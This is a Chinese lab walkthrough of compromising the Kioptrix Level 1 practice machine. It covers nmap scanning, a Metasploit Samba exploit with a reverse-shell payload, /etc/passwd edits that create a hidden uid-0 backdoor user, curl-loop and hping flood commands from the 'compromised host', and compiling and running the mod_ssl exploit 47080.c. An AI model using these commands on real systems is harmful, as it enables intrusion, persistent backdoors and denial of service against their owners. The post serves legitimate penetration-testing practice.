kali渗透之多种方式获得Kioptrix_Level_1权限

目录

攻击机

         靶机

确定IP

扫端口

Samba

提权

mod_ssl


注:以下内容仅供学习交流,请勿用于非法途径

攻击机

kali

靶机

Kioptrix_Level_1

链接: https://pan.baidu.com/s/1mKgDej801fuFzBdD8U7IXA?pwd=4tmr 提取码: 4tmr

确定IP

先扫了一下局域网确定一下IP地址,可以通过过MAC地址来确定1e0e88bb4f737b0abe153baa6619ceb5.png

扫端口

nmap 192.168.1.105 -p- -sV -sS -T4 -A

-p- :扫描全部端口

-sV : 扫描服务版本

-sS : TCP SYN扫描

-T4 : 扫描时序,数字越大,速度越快

-A : 综合扫描

Samba

Samba是在LinuxUNIX系统上实现SMB协议的一个免费软件,由服务器及客户端程序构成。SMB(Server Messages Block,信息服务块)是一种在局域网上共享文件和打印机的一种通信协议,它为局域网内的不同计算机之间提供文件及打印机等资源的共享服务。SMB协议是客户机/服务器型协议,客户机通过该协议可以访问服务器上的共享文件系统、打印机及其他资源。通过设置“NetBIOS over TCP/IP”使得Samba不但能与局域网络主机分享资源,还能与全世界的电脑分享资源。(摘自百度百科)

使用SMB协议主要用到139和445端口

扫一下SMB漏洞

1、enum4linux:SMB枚举工具(利用空会话认证,收集靶机信息)

enum4linux 192.168.1.105

发现没有空会话漏洞,所以我们换个思路

  1. 使用searchsploit查询一下SMB服务漏洞

发现一堆

由于我们现在还不知道它使用的版本,所以除了一个个试的最后方法外,我们还可以用到一个工具来扫描它的SMB版本信息,MSF(美少妇)

利用查询版本模块

search smb_version

使用这一模块并进行设置

找到了版本号

所以我们可以使用精准查询

search samba 2.2

我们使用Linux那个的,使用并设置

发现进不去,可能这个靶机版本太老了,我们改一下攻击载荷试试

set payload linux/x86/shell_reverse_tcp

这个是反向shell链接,没有用到MSF攻击载荷模块

这次成功进入

发现我们是root权限

但是我们发现虽然我们是root权限,但是好像很多东西都被限制了

提权

这里用到的方法是添加一个root权限用户,也就是0 0

添加一个用户试试

useradd xiaoming

很不辛的是,我们的权限太低了,连添加账户都做不到,这时候我们又要找一个新的思路,既然我们的权限那么小,那能不能尝试使用那些高权限的用户的

我们可以先用w看看有没有什么用户在线,不过发现没有用户在线

既然如此,我们尝试修改一个其他账户john的密码,毕竟我们是root权限

诶,结果发现还真的可以

我们前面知道它也开了ssh端口,所以我们用xshell进去一下

输入刚刚设置的密码123456

成功进入

但是发现这个账户还是没有权限

没办法,再换一个试试,毕竟这东西本身就是在不断的试错中得到正确答案,这也是渗透的魅力之一

这次我们来个狠的,直接试一下root这个账户

这次发现成功进来了,不过为了隐蔽性我们创建一个暂时是普通用户的用户,xiaoming

好了,现在我们正式进行提权

进入vim /etc/passwd修改成00即可

我们登录一下看看,成功进入,而且没有权限限制

进来后我们可以利用这台肉鸡进行肉鸡流量污染,当然了这里不能讲,我们这里做个小测试就行。

这里我们使用我们的kali作为靶机

kali查看一下流量

watch -n 1 "sar -n DEV 1 2"

IFACE: LAN接口

rxpck/s : 每秒中接收的数据包

txpck/s : 每秒中发送的数据包

rxbyt/s : 每秒中接收的字节数

txbyt/s : 每秒中发送的字节数

可以写个脚本

for ((i=1;i<=$1;i++));

do

curl http://192.168.1.106

done

运行一下

sh wr.sh 1000000

发现kali这边瞬间就起飞了,不过由于虚拟机是无限带宽的,所以感觉不是很明显

或者我们可以用来利用洪水攻击

hping -c 100000 -n -i u1 -S -d 2000000 192.168.1.106

具体效果就不在这里演示了

mod_ssl

渗透的方式有很多种,除了刚刚说的samba,我们也可以利用这个漏洞看看能不能进去

搜一下相关漏洞

serachsploit mod_ssl

这里有好几个,我们可以一个一个地试一试,不过我们这里为了节省时间,我们直接使用这个试过后可行的

searchsploit -m 47080.c

编译一下这个漏洞文件

gcc -o mod_ssl_exp 47080.c -lcrypto

查看漏洞帮助

./mod_ssl_exp -h

这里需要指定target,之前我们发现是redhat机器,所以在target中选择redhat即可,挨个尝试可找到0x6b时可反弹shell

./mod_ssl_exp 0x6b 192.168.1.105 443 -c 50

进入后的提权操作可以自行尝试

当然了, 除了这里两种,或许我们也可以通过他的80端口进行渗透,这些就需要大家自行尝试了。

  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

翎~翊

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值